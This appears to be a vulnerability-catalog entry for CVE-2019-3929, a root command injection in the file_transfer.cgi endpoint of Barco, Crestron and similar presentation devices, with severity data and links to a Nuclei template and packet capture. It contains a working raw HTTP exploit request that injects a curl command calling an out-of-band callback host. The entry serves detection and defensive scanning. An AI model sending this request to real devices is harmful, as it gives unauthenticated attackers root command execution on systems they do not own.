| Title | Barco/AWIND OEM Presentation Platform - Remote Command Injection |
|---|---|
| Author | _0xf4n9x_ |
| Severity | Critical |
| Impact | Successful exploitation of this vulnerability could lead to unauthorized remote code execution, potentially compromising the confidentiality, integrity, and availability of the affected system. |
| Remediation | Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability. |
| CVSS Score | 9.8 |
| EPSS Score | 0.94346 |
| CVE ID | CVE-2019-3929 |
| CWE ID | CWE-78,CWE-79 |
| Tags | cve cve2019 tenable oast injection kev edb rce packetstorm crestron vkev vuln |
The Crestron AM-100 firmware 1.6.0.2, Crestron AM-101 firmware 2.7.0.1, Barco wePresent WiPG-1000P firmware 2.3.0.10, Barco wePresent WiPG-1600W before firmware 2.4.1.19, Extron ShareLink 200/250 firmware 2.0.3.4, Teq AV IT WIPS710 firmware 1.1.0.7, SHARP PN-L703WA firmware 1.4.2.3, Optoma WPS-Pro firmware 1.0.0.5, Blackbox HD WPS firmware 1.0.0.5, InFocus LiteShow3 firmware 1.0.16, and InFocus LiteShow4 2.0.0.7 are vulnerable to command injection via the file_transfer.cgi HTTP endpoint. A remote, unauthenticated attacker can use this vulnerability to execute operating system commands as root.
POST /cgi-bin/file_transfer.cgi HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:139.0) Gecko/20100101 Firefox/139.0
Connection: close
Content-Length: 99
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
file_transfer=new&dir=%27Pa_Noteexpr%20curl%2bd5jphchle0o35d3dchvg898ndf4cno1qe.oast.sitePa_Note%27
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-3929.yaml
🦈 Packet Capture: ⬇️ Download cve-2019-3929.pcap
N/AN/A